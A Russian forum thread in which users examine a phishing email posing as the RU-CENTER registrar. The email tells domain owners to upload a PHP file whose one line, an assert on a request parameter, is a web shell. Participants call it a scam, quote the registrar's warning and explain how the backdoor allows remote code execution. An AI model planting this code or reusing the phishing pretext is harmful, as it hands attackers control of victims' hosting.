--}}
Новая тема
Вы не можете создавать новые темы.
Т.к. вы неавторизованы на сайте. Пожалуйста назовите себя или зарегистрируйтесь.
Список тем

Странное сообщение от RU-CENTER

Нужен совет (поиск решения проблемы. не для купли-продажи)
3402
30
С друзьями на NN.RU
В социальных сетях
Поделиться
anso
21.06.2017
Сегодня получил письмо от RU-CENTER [no-reply@nic.technical] такого содержания:

Уважаемый клиент!

В соответствии с изменениями, внесенными в регламент ICANN, Вы должны подтвердить, что фактическое управление доменом *******.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете возможность управлять доменом, создайте в корневой директории сайта файл a1ntib9sivzfl3lk.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Файл должен быть создан в течение трех рабочих дней с момента получения настоящего уведомления и находиться на сервере до 5 июля 2017 года, 18:00 (UTC+03:00), в противном случае процедура подтверждения будет считаться непройденной.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

Это очередной обман?
acella
21.06.2017
Вот каким боком тут делегирование домена и сайт, которого может и не быть вовсе.
Совсем спамеры обленились (цы) :-D
anso писал(а)
stripslashes


Да, очередной обман.
FreeCat
21.06.2017
это сообщение рассылалось аж 20 мая, а 23-го, прочухав, наконец, Ру-центр опровержение разослал всем, кто у него клиент:

Уважаемый клиент!

Некоторые наши клиенты получили письма от имени RU-CENTER c требованием разместить в корневой директории сайта вредоносный файл якобы для подтверждения права владения доменом. Такие письма рассылаются мошенниками по адресам, находящимся в открытом доступе.

Мы никогда не требуем подтвердить право на домен таким способом и не запрашиваем у клиентов пароли в электронных письмах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов.

Чтобы не стать жертвой мошенничества:

Проверяйте достоверность информации на сайте nic.ru , если вы получили письмо, призывающее произвести проверку домена, оплату или любое другое действие, связанное с изменением правил.
Если в письме содержится ссылка на сайт RU-CENTER, после перехода по ней убедитесь, что вы находитесь на сайте по адресу nic.ru , в адресной строке присутствует зелёный замок и для сайта установлен сертификат, выданный JSC 'RU-CENTER'.
В случае малейших подозрений — уточняйте информацию в службе поддержки.

Будьте бдительны!


У мня как раз 20-го мая знакомым пришло подобное письмо :) ... разъяснял им :) .
anso
22.06.2017
Как мошенники узнали почтовые адреса? RU-CENTER слил?
Atom
22.06.2017
они в открытом доступе, если владелец домена их сам не скрыл :)
anso
22.06.2017
Как можно скрыть почтовый адрес?
Atom
22.06.2017
В Руцентре это доп услуга "Защита контактных данных".
У других и бесплатно бывает. Подменные адреса используют.
Это очередной обман?

А из просьбы разве не очевидно?

cs6.pikabu.ru/post_img/2015/06/05/11/1433530088_1880699977.jpg
FreeCat
21.06.2017
изначально, в конце 80-х, это был пакистанский вирус :-D ...
Я уже и не помню как было в оригинале, картинку нашёл по запросу «узбекский вирус» :-D

UPD: а по запросу «пакистанский вирус» нашёл про узбекский s.pikabu.ru/post_img/2013/03/26/10/1364317072_484076551.jpg
Гугл такой гугл...
Yakov-K
21.06.2017
Я так и не нашёл инфу, какие виды повреждений может причинить этот assert.
Физически это передача произвольного кода php извне на выполнение у меня, в моей среде. А каковы его возможности?
Код, запущенный, например, в моей php-машине (или как правильно это называется?) может, хотя бы, модифицировать мои файлы? В смысле, файлы, мирно лежащие на хостинге (сам сайт).
Или этот механизм у злопыхателей используется как рассылка спама от моего адреса, например?
FreeCat
21.06.2017
Yakov-K писал(а)
Я так и не нашёл инфу, какие виды повреждений может причинить этот assert.

может, в завсисмости от настроек у тебя, загрузить тебе шелл - а дальше уже будут через него управлять :) .
Atom
21.06.2017
Yakov-K писал(а)
Я так и не нашёл инфу, какие виды повреждений может причинить этот assert.

Что угодно может сделать. Вплоть до выполнения shell команд, если не стоит запрет на shell_exec, exec, system и иже с ними в php.ini.
Yakov-K
21.06.2017
Atom писал(а)
shell команд

Если можно, в двух словах для чайника? Я в этих шеллах не рублю - основная тематика слишком много ресурсов у меня отнимает.
Этот шелл - он на стороне хостера запускается?
(если лень отвечать, можно хотя бы инфу о том, что почитать?)
Atom
21.06.2017
Командная оболочка. Любые команды на сервере можно будет выполнить. Последствия могут быть очень печальные, в зависимости от прав пользователя, под которым работает веб сервер.

Ну а про возможность модифицировать / скачать / удалить файлы сайта и базу данных уж молчу
Yakov-K
22.06.2017
Ясно, просто я думал, что сам термин shell может иметь какое-то более глобальное значение. С шеллом как механизмом (средой?) командной строки в UNIX я, так-то, знаком уже лет двадцать. :) Просто не догнал немного про то, что имеется в виду управление сервером самого хостера. Но тогда получается, что, если у меня есть резервная копия, то это проблемы хостера :)

Краем уха слышал, что шеллы бывают разные - bash, ещё какие-то. Где-то это называется, почему-то, "терминал".

зы Ещё сбили слова Кота - загрузить ТЕБЕ (мне - это в куда?) :)
FreeCat
22.06.2017
Yakov-K писал(а)
Ясно, просто я думал, что сам термин shell может иметь какое-то более глобальное значение

не. именно так и там употребляется :) . собственно из Юниксов это знаение и пошло :) ...
FreeCat
22.06.2017
Yakov-K писал(а)
зы Ещё сбили слова Кота - загрузить ТЕБЕ (мне - это в куда?)

на хостинг твоего сайта :) .
FreeCat
22.06.2017
Yakov-K писал(а)
управление сервером самого хостера

это скорее управление хостингом твоего сайта/сайтов. управление сервером будет если он у тя дедик(выделенный) или его виртуальный аналог :) .
FreeCat
22.06.2017
Yakov-K писал(а)
Краем уха слышал, что шеллы бывают разные - bash, ещё какие-то.

bash и прочеее - это бинарный файл. в данном случае загружается файл в формате РНР(обычно) - но с теми же задачами - служить оболочкой(отсюда и shell) между тобой(или тем кто управляет) и "управляемой средой" - в данном случае хостингом и/или сервером хостинга.
Исполнение php кода, переданного по запросу mysite.ru/?RUCENTER=код или аналогичным post запросом.

Может использоваться для чего угодно, рассылки спама, ddos других ресурсов, можно БД твоего сайта читать, если есть права на запись, можно скачать дополнительный php код, который злоумышленники будут использовать, можно модифицировать имеющийся php код или статичные страницы и показывать посетителям баннер, а можно предлагать посетителям скачать троян (попадались такие заражённые сайты).
Yakov-K
22.06.2017
Понятно.
Т.е. если сайт не использует какой-либо обмен (ту же базу) и не содержит сложных скриптов - то, можно сказать, что и бояться нечего. Т.е. достаточно прогуляться по страницам - глянуть, не изменилось ли чего явным образом, а в крайнем случае - просто презалить резервную копию на хостинг. Гораздо сложнее на тяжёлых сайтах, получается. Там "просто глазами" хрен чего увидишь наверное - месяц копаться надо (опять же, проще перезалить, но вот если база?).
В принципе они могут например рассылать спам с зараженного сервера и не модифицируя ничего на сайте, а просто каждый раз делая запрос к такому скрипту.

Там "просто глазами" хрен чего увидишь наверное - месяц копаться надо (опять же, проще перезалить

Можно систему контроля версий использовать, например git. Он покажет какие файлы были изменены и покажет разницу, отличающиеся строки.
FreeCat
22.06.2017
Yakov-K писал(а)
Т.е. если сайт не использует какой-либо обмен (ту же базу) и не содержит сложных скриптов - то, можно сказать, что и бояться нечего.

нет, не так. твой сайт тут вообще не при чём :-D . Играет роль только возможности твоего хостинга. А поскольку РНР сейчас включен по умолчанию везде - то и самый простой сайт "заразят" так же как и "сложный" :-D .
Не, он о том что если у него сайт состоит из всего пары скриптов то обнаружить и вылечить легко.
FreeCat
22.06.2017
так бывают вообще без скриптов :) .
Да, бывают статические сайты. Тем не менее т.к. php с большой вероятностью всё равно будет иметься, то всё равно вредоносный скрипт можно засунуть куда нибудь.
FreeCat
23.06.2017
ну если вебмастер на хостинге не отключил, что бывает крайне редко на практике - то так и есть :) .
Atom
21.06.2017
бггг :))))

если assert передать строку, то интерпретатор будет пытаться выполнить как код (аналогично eval)

а код мы подсунем в запросе :)
Новая тема
Вы не можете создавать новые темы.
Т.к. вы неавторизованы на сайте. Пожалуйста назовите себя или зарегистрируйтесь.
Список тем